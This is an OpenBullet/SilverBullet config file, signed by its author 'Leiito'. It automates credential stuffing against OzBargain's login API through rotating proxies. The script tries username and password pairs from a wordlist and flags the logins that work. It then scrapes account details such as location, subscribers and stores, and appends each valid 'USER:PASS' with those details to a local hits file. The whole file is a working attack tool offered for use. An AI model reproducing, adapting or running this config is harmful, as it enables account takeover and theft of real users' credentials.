[SETTINGS]
{
  "Name": "OzBargain -Leiito-",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-06-26T16:56:31.472918+00:00",
  "AdditionalInfo": "Leiito",
  "RequiredPlugins": [],
  "Author": "Leiito",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "OzBargain -Leiito-",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": "Author Leiito",
  "Message": "Author Leiito",
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://www.ozbargain.com.au/ozbapi/login/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "name=\"form_token\" value=\"" "\"/>" -> VAR "token" 

REQUEST POST "https://www.ozbargain.com.au/ozbapi/login/" 
  CONTENT "form_token=<token>&name=<USER>&pass=<PASS>&form_id=user_login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "origin: https://www.ozbargain.com.au" 
  HEADER "referer: https://www.ozbargain.com.au/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Sorry. Unrecognised username or password." 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "Sorry. Unrecognised username or password." 

REQUEST GET "https://www.ozbargain.com.au/user/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "class=\"cnt\">(" "subscribers)" CreateEmpty=FALSE -> CAP "Subscribers" 

PARSE "<SOURCE>" LR "<th>Last Seen</th>" "</td>" CreateEmpty=FALSE -> CAP "LastSeen" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<LastSeen>" Contains "<td>" 
  KEYCHAIN Failure OR 
    KEY "<LastSeen>" DoesNotContain "<td>" 

PARSE "<SOURCE>" LR "<th>Member Since</th>" "</td>" CreateEmpty=FALSE -> CAP "MemberSince" 

PARSE "<SOURCE>" LR "<th>Location</th>" "</td>" CreateEmpty=FALSE -> CAP "Location" 

PARSE "<SOURCE>" LR "(#" ")" -> VAR "n" 

REQUEST GET "https://www.ozbargain.com.au/user/<n>/files" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "id=\"files-total\">" "</b> for the life of this account." CreateEmpty=FALSE -> CAP "UploadedFiles" 

REQUEST GET "https://www.ozbargain.com.au/user/<n>/stores" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "class=\"active\">stores</a></li></ul></div>" "</div>" CreateEmpty=FALSE -> CAP "Store" 

UTILITY File "OzBargain By Leiito.txt" AppendLines "-- <USER>:<PASS> -- CAPTURE -- | Subscribers = <Subscribers> | Last Seen = <LastSeen> | Member Since = <MemberSince> | Location = <Location> | Uploaded Files = <UploadedFiles> | Stores = <Store> | Author = Leiito |" -> VAR "1" 

FUNCTION Constant "Author Leiito" -> CAP "Author Leiito" 

